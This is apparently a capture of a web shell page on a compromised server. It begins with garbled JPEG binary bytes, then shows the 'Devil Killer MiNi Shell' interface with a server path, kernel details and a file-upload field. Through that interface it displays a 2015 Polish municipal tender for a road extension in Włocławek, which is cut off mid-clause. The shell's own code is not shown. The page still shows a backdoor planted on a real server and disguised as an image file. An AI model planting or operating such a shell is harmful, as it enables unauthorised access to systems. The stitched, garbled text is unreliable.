JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150716/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150716/179762-N-2015.html

<p class="kh_header"><b>Włocławek: Rozbudowa ulicy Stodólnej na odcinku od ul. Targowej do ul. Królewieckiej wraz infrastrukturą towarzyszącą - I etap (łącznik między ul. Targową i ul. Towarową)</b><br>
<b>Numer ogłoszenia: 179762 - 2015; data zamieszczenia: 16.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Włocławek - Urząd Miasta Włocławek , ul. Zielony Rynek 11/13, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 54 4144000, faks 54 4144257.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wloclawek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa ulicy Stodólnej na odcinku od ul. Targowej do ul. Królewieckiej wraz infrastrukturą towarzyszącą - I etap (łącznik między ul. Targową i ul. Towarową).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane związane z rozbudową ulicy Stodólnej na odcinku 
od ul. Targowej do ul. Królewieckiej we Włocławku wraz z infrastrukturą towarzyszącą, będące kontynuacją wykonanego wcześniej II-go etapu.

W zakresie zamówienia ujęto wykonanie projektowanej ulicy łączącej ul. Targową z ul. Towarową 
od km 0+000 do km 0+130.65 na odcinku od skrzyżowania z ul. Stodólną do skrzyżowania 
z ul. Łęgską (bez skrzyżowań). W chwili obecnej brak jest połączenia ul. Targowej z ul. Towarową.

Projektowana ulica posiadać będzie powiązanie z siecią dróg miejskich i chodników sąsiadujących ulic, tj. z drogą powiatową 3322C - ul. Stodólna i drogą gminną 230233C - ul. Targowa w km 0+000 oraz z drogą gminną 230117C - ul. Łęgska i drogą gminną 230236C - ul. Towarowa w km 0+130,65. Oba skrzyżowania zaprojektowano jako skrzyżowania zwykłe. Niwelety ulic nawiązują wysokościowo do istniejących rzędnych skrzyżowań.

Inwestycja zlokalizowana jest na działkach oznaczonych ewidencyjnie nr 52/1, 52/2, 66/1, 67/3, 90, 97 KM 47 obręb Włocławek.

Zamówienie obejmuje zakres wskazany w dokumentacji projektowej, tj.:
1)	wykonanie robót branży drogowej - w zakresie opisanym w dokumentacji projektowej z wyłączeniem robót drogowych w obrębie ul. Łęgskiej, w szczególności wykonanie:
- pasów jezdni,
- ciągów chodnikowych,
- pasa postojowego,
- zjazdów,
- włączenia do istniejącego układu komunikacyjnego miasta,
2)	wykonanie kanalizacji deszczowej - w zakresie opisanym w dokumentacji projektowej, z wyłączeniem robót związanych z włączeniem sieci w kolektor deszczowy w ul. Łęgskiej, w szczególności:
- zdemontowanie istniejącego rurociągu PVC O 200 mm i studni rewizyjnych O 1200 mm,
- wykonanie nowego rurociągu PVC O 315 mm i O 400 mm oraz studni rewizyjnych 
O 1200 i O 1500 mm,
- montaż wpustów ulicznych,
3)	wykonanie robót branży elektrycznej - w całości, zgodnie z dokumentacją projektową, w szczególności:
- montaż 5 szt. stanowisk oświetleniowych,
- ułożenie kabla zasilającego i podłączenie go do istniejącej szafki oświetleniowej zrealizowanej w ramach poprzedniego etapu.
4)	wykonanie robót branży zieleń - w całości, zgodnie z dokumentacją projektową, w szczególności:
- splantowanie terenów i ułożenie warstwy humusu z obsianiem,
- wykonanie nasadzeń drzew i krzewów,
 pielęgnowanie zieleni,
5)	wykonanie docelowego oznakowania poziomego i pionowego oraz organizacji ruchu - w całości, zgodnie z dokumentacją projektową.

Roboty będą prowadzone na podstawie decyzji Prezydenta Miasta Włocławek o zezwoleniu na realizację inwestycji drogowej nr 398 / 13 z dnia 5 listopada 2013 r., znak UA.AB.6740.645.2013. 

Szczegółowy opis przedmiotu zamówienia, w tym technologie i zakres prac, zostały określone w dokumentacji projektowej oraz w Szczegółowych Specyfikacjach Technicznych Wykonania i Odbioru Robót Budowlanych.

Gdziekolwiek w dokumentacji, SSTWiORB powołane są konkretne przepisy, normy, wytyczne i katalogi, będą obowiązywać postanowienia najnowszego wydania lub poprawionego wydania powołanych przepisów, norm, wytycznych i katalogów.
Tam, gdzie w Specyfikacjach Technicznych Wykonania i Odbioru Robót Budowlanych, dokumentacji projektowej zostało wskazane pochodzenie (marka, znak towarowy, producent, dostawca) materiałów lub normy, aprobaty, specyfikacje i systemy, o których mowa w art. 30 ust. 1-3 ustawy - Prawo zamówień publicznych, a w treści SIWZ nie zostały określone wymagania Zamawiającego względem para-metrów materiałów równoważnych, Zamawiający dopuszcza oferowanie materiałów lub rozwiązań równoważnych pod warunkiem, że zagwarantują one realizację robót w zgodzie z wydanym pozwoleniem na budowę oraz zapewnią uzyskanie parametrów techniczno-eksploatacyjnych - pod względem funkcjonalnym nie gorszych od założonych w wyżej wymienionych dokumentach.

Wykonanie przedmiotu zamówienia ma nastąpić zgodnie z opracowaną dokumentacją projektową i wydanym pozwoleniem na budowę. W przypadku jakichkolwiek nieścisłości, niezgodności, niespójności w dokumentacji, Wykonawca będzie zobowiązany do opracowania na własny koszt zamiennych rozwiązań (wraz z dokonaniem koniecznych uzgodnień) i wykonania na ich podstawie robót również na własny koszt.

W zakresie przedmiotu zamówienia należy również uwzględnić:
a)	likwidację wszelkich odkrytych w toku robót, a nieujawnionych w dokumentacjach, kolizji z urządzeniami infrastruktury technicznej,
b)	odtworzenie nawierzchni ulic przyległych, również w przypadku ingerencji większej niż przewidują dokumentacje projektowe (np. w przypadku usuwania kolizji),
c)	roboty pomiarowe, geodezyjną inwentaryzację powykonawczą, sporządzenie projektów tymczasowej organizacji ruchu,
d)	wszelkie inne koszty niezbędne do prawidłowego wykonania zamówienia.

Na przedmiotowych odcinkach mogą być jednocześnie prowadzone przez gestorów sieci na ich rzecz, bądź na rzecz Zamawiającego, inne roboty budowlane. Wykonawca, na polecenie Zamawiającego, ma obowiązek wpuścić na plac budowy wskazanych wykonawców robót.

Okres rękojmi i gwarancji wynosi 60 miesięcy, z wyjątkiem zieleni (nasadzeń), dla których okres ten ustalono na 36 miesięcy, od daty podpisania protokołu odbioru ostatecznego.
Wykonawca zobowiązany będzie również do pielęgnacji zieleni (w szczególności trawników, drzew i krzewów) przez okres gwarancji.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.31.40-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 120.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do prowadzonego postępowania o udzielenie zamówienia publicznego każdy Wykonawca zobowiązany jest wnieść wadium w kwocie 7.000,00 złotych</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu dokonywania oceny spełniania warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca, ubiegający się o udzielenie zamówienia, musi wykazać się wykonaniem w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 robotę budowlaną, polegającą na budowie, rozbudowie, przebudowie dróg lub ulic wraz z infrastrukturą towarzyszącą o wartości (łącznie z infrastrukturą) nie mniejszej niż 400.000,00 złotych brutto</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca, ubiegający się o udzielenie zamówienia, musi wykazać się posiadaniem wymienionych poniżej narzędzi i urządzeń technicznych niezbędnych do wykonania zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia wymienionych poniżej narzędzi i urządzeń technicznych niezbędnych do wykonania zamówienia, tj.: 1. Szczotka mechaniczna - 1 sztuka, 2. Frezarka - 1 sztuka, 3. Koparko - ładowarka - 1 sztuka, 4. Walec drogowy - 1 sztuka, 5. Samochody samowyładowcze o ładowności minimum 10 Mg - w liczbie zapewniającej ciągłość pracy, jednak nie mniej niż 2 sztuki. 6. Skrapiarka sterowana elektronicznie - 1 sztuka, 7. Laboratorium stałe lub udokumentowany dostęp do usług laboratoryjnych - 1 sztuka, 8. Wytwórnia masy bitumicznej o wydajności 120 Mg/h - 1 sztuka</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca, ubiegający się o udzielenie zamówienia, musi wykazać się dysponowaniem wymienionymi poniżej osobami przewidzianymi do realizacji zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia wymienionych poniżej osobami przewidzianymi do realizacji zamówienia, które będą uczestniczyły w realizacji zamówienia i będą odpowiedzialne za kierowanie robotami budowlanymi, zgodnie z dyspozycją art. 12 ustawy - Prawo budowlane:
1)	kierownik budowy, który jednocześnie będzie pełnił funkcję kierownika robót branży drogowej -  posiadający uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej i co najmniej 1 rok doświadczenia w branży drogowej na stanowisku kierownika budowy lub kierownika robót branży drogowej,
2)	kierownik robót branży sanitarnej - posiadający uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, posiadający co najmniej 1 rok doświadczenia w branży sanitarnej na stanowisku kierownika robót lub kierownika budowy,
3)	kierownik robót branży elektrycznej posiadający uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu dokonywania oceny spełniania warunków w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Roboty budowlane, polegające na budowie, rozbudowie, przebudowie dróg lub ulic wraz z infrastrukturą towarzyszącą;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. formularz oferty. 2. dowód wniesienia wadium. 3. pełnomocnictwo do podpisania oferty, o ile nie wynika ono z innych dokumentów załączonych przez Wykonawcę</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin realizacji zamówienia - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza możliwość wprowadzania zmiany w treści umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawierania umowy lub w przypadku wystąpienia którejkolwiek z następujących okoliczności:
1)	przedłużenie terminu realizacji zamówienia może nastąpić w przypadku wystąpienia zdarzeń niezależnych od Wykonawcy, takich jak:
a)	wystąpienie okoliczności siły wyższej, przez którą należy rozumieć zdarzenia niezależne od żadnej ze stron umowy, zewnętrzne, niemożliwe do zapobieżenia, które nastąpiło po dniu wejścia w życie umowy, w szczególności: wojny, akty terroryzmu, klęski żywiołowe, strajki oraz akty władzy i administracji publicznej, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni, odpowiadającą okresowi występowania okoliczności siły wyższej,
b)	wydanie zakazu prowadzenia robót przez organ administracji publicznej, o ile żądanie lub wydanie zakazu nie nastąpiło z przyczyn, za które Wykonawca ponosi odpowiedzialność, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni, odpowiadającą okresowi obowiązywania zakazu prowadzenia robót,
c)	wystąpienie kolizji z podziemnymi sieciami lub urządzeniami, dla rozwiązania których niezbędne jest opracowanie projektu zamiennego (zamiennych rozwiązań), przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni, odpowiadającą okresowi wstrzymania robót,
d)	udzielenie podczas realizacji umowy zamówień dodatkowych w trybie art. 67 ust. 1 pkt 5 ustawy - Prawo zamówień publicznych, związanych z realizacją zamówienia podstawowe-go, mających wpływ na umówiony termin realizacji zamówienia (powodujący konieczność jego przedłużenia), przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni niezbędną Wykonawcy do zrealizowania zamówienia dodatkowego,
e)	wydanie Wykonawcy polecania, skutkującego koniecznością przedłużenia terminu realizacji zamówienia, a w szczególności wydania Wykonawcy polecenia wstrzymania robót w związku z koniecznością ich skoordynowania z robotami realizowanymi przez gestorów sieci na terenie budowy lub innymi robotami realizowanymi w bezpośrednim sąsiedztwie terenu budowy na rzecz Zamawiającego, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni, odpowiadającą okresowi wstrzymania robót,
f)	wystąpienie kolizji z naziemnymi lub podziemnymi sieciami lub urządzeniami, nieprzewidzianymi w dokumentacji projektowej, których usunięcie będzie miało wpływ na umówiony termin realizacji zamówienia, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni, odpowiadającą okresowi prowadzenia robót budowlanych związanych z usunięciem tych kolizji,
g)	wystąpienie konieczności wykonania robót zamiennych, związanych z koniecznością dokonania zmian projektowych bądź zmiany technologii (do wykonania których wystarczy zgoda Zamawiającego oraz projektanta), rozumianych jako wykonanie przez Wykonawcę zamówienia podstawowego w sposób odmienny od sposobu określonego w umowie, a jednocześnie w sposób niepowodujący zwiększenia (zmiany) zakresu świadczenia Wykonawcy zawartego w ofercie oraz zwiększenia wynagrodzenia Wykonawcy, z zastrzeżeniem punktu 2,
